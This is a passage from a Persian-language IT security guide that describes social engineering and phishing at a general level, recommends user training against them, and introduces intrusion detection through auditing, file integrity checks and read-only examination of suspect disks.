‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﺧﻲ ﺍﺷﻜﺎﻻﺕ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ‪ ،‬ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﻳـﻚ‬
‫ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺭﺍ ﺑﻪ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺯﺑﺪﻩ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﻤﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻧﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﻋﺎﺩﻱ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺭﺍﻫﻬﺎﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﻮﻥ "ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ" ﺍﺳﺖ‪ .‬ﻣﻬﻨﺪﺳـﻲ ﺍﺟﺘﻤـﺎﻋﻲ‬
‫ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻭ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻛﺴﺐ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﻣﻬﻨﺪﺳـﻲ‬
‫ﻻ ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻣﻘﺼﺪ ﺗﻠﻔﻦ ﻣﻲﺯﻧﺪ ﻭ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻗﺮﺍﺭﻱ ﺭﻭﺍﺑﻂ ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺍﻃﻼﻋﺎﺗﻲ‬ ‫ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺗﻈﺎﻫﺮ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﺮﺩﻩ‪ ،‬ﻭ ﺑﺨﻮﺍﻫـﺪ ﻛـﻪ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭﺵ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻈﺎﻫﺮ ﻛﻨﺪ ﻛﻪ ﻧﻤﺎﻳﻨﺪﺓ ﻳﻚ ﺳﺮﻭﻳﺲ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻧﻴـﺎﺯ ﺩﺍﺭﺩ ﻛـﻪ ﺭﻣـﺰ‬
‫ﻻ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﭼـﻮﻥ ﻋﻤـﻮﻡ ﻣـﺮﺩﻡ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺩﺭ ﺣـﻞ‬ ‫ﻋﺒﻮﺭ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻧﻔﺲ ﺩﺍﻧﺴﺖ‪.‬‬‫ﻝ ﺭﺍﻳﺎﻧﻪﺍ ﹺ‬
‫ﻣﺸﻜﻼﺕ ﺳﻬﻴﻢ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻭﺍﻗﻊ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻣﺴﻴﺮ ﺍﻳﻦ ﺣﻤﻼﺕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻣﻌﺎﺩ ﹺ‬
‫ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ .‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﻪ ﺍﺻﻄﻼﺡ "‪ "phishing‬ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻳﻜﺠـﺎ ﺑـﻪ‬
‫ﻫﺰﺍﺭﺍﻥ ﻳﺎ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻛﺎﺭﺑﺮ‪ ،‬ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻜﻲ ﺍﺯ ﻓﻨﻮﻥ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻲﻓﺮﺳﺘﻨﺪ‪ .‬ﺑﺮﺧـﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺩﺭﺧﻮﺍﺳـﺖ‬
‫ﺩﺭﻳﺎﻓﺖ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻌﺘﺒﺮ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‪.‬‬
‫ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺷﻲ ﻓﺸﺮﺩﻩ ﻭ ﺟﺪﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ‪ .‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺩﺍﺩ‬
‫)ﻭ ﻣﺘﻨﺎﻭﺑﹰﺎ ﺑﻪ ﺁﻧﻬﺎ ﻳﺎﺩﺁﻭﺭﻱ ﻛﺮﺩ( ﻛﻪ ﻫﻴﭽﮕﺎﻩ ﺑﻪ ﻛﺴﻲ ﻛﻪ ﺍﻭ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻛﺎﺭﻣﻨﺪ ﻣﺠﺎﺯ ﺑﺨﺶ ﺍﻣﻨﻴﺘﻲ ﺳﺎﺯﻣﺎﻥ ﻧﻤـﻲﺷﻨﺎﺳـﻨﺪ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻧﺪﻫﻨﺪ‪ ،‬ﻭ ﺣﺘﻲ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﻫﻢ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﻨﻬﺎ ﺑﻪ ﺧﻮﺩ ﺷﺨﺺ ﺑﺪﻫﻨﺪ‪ .‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﮔﻔﺘﻪ ﺷﻮﺩ ﻛﻪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻫﻴﭽﮕﺎﻩ ﺍﺯ ﺁﻧﺎﻥ ﻧﺨﻮﺍﻫﺪ ﺧﻮﺍﺳﺖ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻋﻨﺎﺻﺮ ﻣﮑﻔﻲ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﻓـﺎﺵ ﺳـﺎﺯﻧﺪ؛ ﻭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭﺻﻮﺭﺕ ﺩﺭﻳﺎﻓﺖ ﭼﻨﻴﻦ ﭘﻴﺎﻣﻬﺎﻳﻲ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺭﺍ ﺳﺮﻳﻌﹰﺎ ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ‪.‬‬
‫‪٤٢٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﻧﻬﻢ‬
‫ﻛﺸﻒ ﻭ ﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺩﺳﺘﻜﺎﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺗﺪﺍﺑﻴﺮﻱ ﭼـﻮﻥ ﺑـﺎﺯﺑﻴﻨﻲ‪،‬‬
‫ﺛﺒﺖ ﻭﻗﺎﻳﻊ‪ ،‬ﻭ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻛﺸﻒ ﺩﺳﺘﻜﺎﺭﻳﻬﺎ ﻭ ﺗﺸﺨﻴﺺ ﺗﻐﻴﻴﺮﺍﺕ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻭ ﻣﺮﺣﻠﻪ ﺑﻪ ﻣﺮﺣﻠﻪ ﺭﺍﻩ ﺑﺪﺳﺖﮔﻴﺮﻱ ﻣﺠﺪﺩ‬
‫ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻧﺸﺎﻥ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪.‬‬

‫ﻣﻤﻴﺰﻱ ﻭ ﺛﺒﺖ ﻭﻗﺎﻳﻊ‬


‫ﺑﻌﺪ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻓﺎﻋﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻓﺎﻋﻲ ﺑﻪ ﺩﺭﺳﺘﻲ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ‬
‫ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺭﻓﺘﺎﺭ ﻏﻴﺮﻋﺎﺩﻱ ﻭ ﺳﺎﻳﺮ ﻣﺸﻜﻼﺕ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻴﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻳﺎ ﻣﻤﻴﺰﻱ ﻣﻲﻧﺎﻣﻨﺪ‪ .‬ﺩﻭ ﻧﻮﻉ ﻣﺘﺪﺍﻭﻝ ﻣﻤﻴﺰﻱ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ‪:‬‬
‫ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻴﺖ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﻭ ﺑﺮﺭﺳﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﻴﺴﺘﻤﻲ‪.‬‬

‫ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ‬


‫ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻻﻳﻞ ﺑﻴﺸﻤﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺻﻠﻲﺗﺮﻳﻦ ﺩﻻﻳـﻞ ﺁﻥ ﺗـﺸﺨﻴﺺ‬
‫ﻻ ﺳﻪ ﺭﺍﻩ ﺑﺮﺍﻱ ﻛﺸﻒ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﺣﻤﻠﺔ ﻧﻔﻮﺫ ﻳﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺍﺳﺖ‪ .‬ﺍﺻﻮ ﹰ‬
‫‪ .١‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﻣﻘﺎﻳﺴﺔ ﺁﻧﻬﺎ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻠﻲ؛ ﻛﻪ ﻣﻄﻤﺌﻦﺗﺮﻳﻦ ﺭﺍﻩ ﻣﺤﺴﻮﺏ ﻣﻲﮔﺮﺩﺩ؛‬
‫‪ .٢‬ﻧﻈﺎﺭﺕ ﺑﺮ ﻓﺮﺍﺩﺍﺩﻩﻫﺎ‪ ٣٣٠‬ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﺎﻳﺪ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ؛ ﺷﺎﻣﻞ ﺯﻣﺎﻥ ﺗﻐﻴﻴﺮ ﺍﻗﻼﻡ‪ ،‬ﻛﻪ ﺑﻮﺳـﻴﻠﺔ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﻧﻴﺰ ﺗﻤﺎﻡ ﺛﺒﺘﻬﺎ ﻳﺎ ﺳﻠﺴﻠﻪﻫﺎﻱ ﻣﻤﻴﺰﻱ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ؛ ﻭ‬
‫‪ .٣‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻮﻋﻲ ﺍﻣﻀﺎ ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻭ ﻣﺤﺎﺳﺒﺔ ﺩﻭﺭﻩﺍﻱ ﻭ ﻣﻘﺎﻳﺴﺔ ﺍﻣﻀﺎﻫﺎ ﺑﺎ ﻳﻚ ﻣﻘﺪﺍﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺩﺍﺭﺍﻱ ﻓﻮﺍﻳﺪ ﻭ ﻣﻀﺮﺍﺗﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍﻫﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺳﺘﻜﺎﺭﻱ‬
‫ﺷﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺗﺮﺩﻳﺪ ﺍﺳﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﺎﺭﺝ ﻛﻨﻴﺪ‪ ،‬ﺩﻳﺴﻚ ﺭﺍ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺩﻳـﺴﻚ ﻛﻤﻜـﻲ‬ ‫•‬
‫ﻭﺻﻞ ﻛﻨﻴﺪ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺩﻭﻡ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺩﻳﺴﻚ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ ‪ mount‬ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧـﺔ ﺩﻭﻡ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺩﻳﺴﻚ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﻳﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ‪ ،‬ﻋﻴﻨﹰﺎ ﻳﻚ ﻧﺴﺨﺔ ﺩﻭﻡ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻚ ﺗﻬﻴﻪ ﻛﻨﻴﺪ(‪.‬‬
‫ﺩﻳﺴﻚ ﻣﺸﻜﻮﻙ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﺑﺎﻗﻲ ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺍﻣﺎ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻄﻤـﺌﻦ ﺍﺯ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ‬ ‫•‬
‫ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ‪ .‬ﺳﭙﺲ ﺗﻨﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ ﺩﻳـﺴﻚ ﻓﻼﭘـﻲ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﻳـﺴﻚ‬
‫ﻻ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﺓ ﺁﻧﺮﺍ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ ‪ mount‬ﻛﻨﻴﺪ ﻭ ﺳﻴﺴﺘ ﹺﻢ ﻓﺎﻳ ﹺ‬
‫ﻞ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻣﺸﻜﻮﻙ ﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭ ﻫﺮ ﺍﺑﺰﺍﺭ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺘﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﺑﻮﺩ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳﺪ‪.‬‬ ‫•‬

‫‪330 Metadata‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢٤‬‬

‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻛﺎﻣﻠﺘﺮﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺳﻴﺴﺘﻢ ﻣﺸﻜﻮﻙ‪ ،‬ﻫﻤﺎﻥ ﺭﻭﺵ ﺍﻭﻝ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺭﻭﺵ ﺳـﻮﻡ ﺭﺍﻳﺠﺘـﺮﻳﻦ ﺭﺍﻫﻜـﺎﺭ ﺍﻣـﺎ ﺩﺭ ﻋﻤـﻞ‬
‫ﻧﺎﻛﺎﻓﻲ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻭﺍﻗﻌﹰﺎ ﻣﻬﺎﺟﻤﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﻪ ﻫﻴﭻ ﭼﻴﺰ ﺁﻥ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ؛ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺷﺎﻣﻞ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ‪ ،‬ﻭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ )ﻧﺴﺨﻪﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ(‬


‫ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﻣﻄﻤﺌﻦﺗﺮﻳﻦ ﻭ ﺭﺍﺣﺖﺗﺮﻳﻦ ﺭﻭﺵ ﻛﺸﻒ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺍﺩﻩﻫﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺗﻐﻴﻴﺮﻧﻴﺎﻓﺘﻪ ﻭ ﻣﻘﺎﻳﺴﺔ ﺑﺎﻳﺖ ﺑـﻪ‬
‫ﺑﺎﻳﺖ ﺁﻧﻬﺎ ﺑﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﺯﻣﺮﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺍﺧﺘﻼﻓﻲ ﻣﻴﺎﻥ ﺍﻳﻦ ﺩﻭ ﻧﺴﺨﻪ ﻣﺸﺎﻫﺪﻩ ﺷﻮﺩ ﻧﻪ ﺗﻨﻬﺎ ﺑﻴﺎﻧﮕﺮ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻥ ﺩﺍﺩﻩﻫـﺎ ﺍﺳـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺭﺍ ﻧﻴﺰ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﻣﻬﻢ ﻳﻚ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﻧﮕﻬﺪﺍﺭﻳـﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ‬
‫ﻧﻪﺗﻨﻬﺎ ﻧﻴﺎﺯﻣﻨﺪ ﻓﻀﺎﻳﻲ ﻣﻌﺎﺩﻝ ﺩﻭ ﺑﺮﺍﺑﺮ ﺣﺠﻢ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺍﺳﺖ‪ ،‬ﺑﻠﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺨﻄﻲ ﺍﺯ ﺿﻮﺍﺑﻄﻲ ﭼﻮﻥ ﺣﻖ ﻣﺎﻟﮑﻴﺖ ﮔﻮﺍﻫﻲ ﻳـﺎ‬
‫ﺣﻖ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﮔﺮﺩﺩ‪) .‬ﻣﻌﻤﻮ ﹰﻻ ﻗﻮﺍﻧﻴﻦ "ﺣﻖ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ" ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﺓ ﻧﮕﻬﺪﺍﺭﻱ ﺗﻨﻬﺎ ﻳﻚ ﻧﺴﺨﻪ ﺭﺍ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲ ﻣـﻲﺩﻫﻨـﺪ‪ ٣٣١(.‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
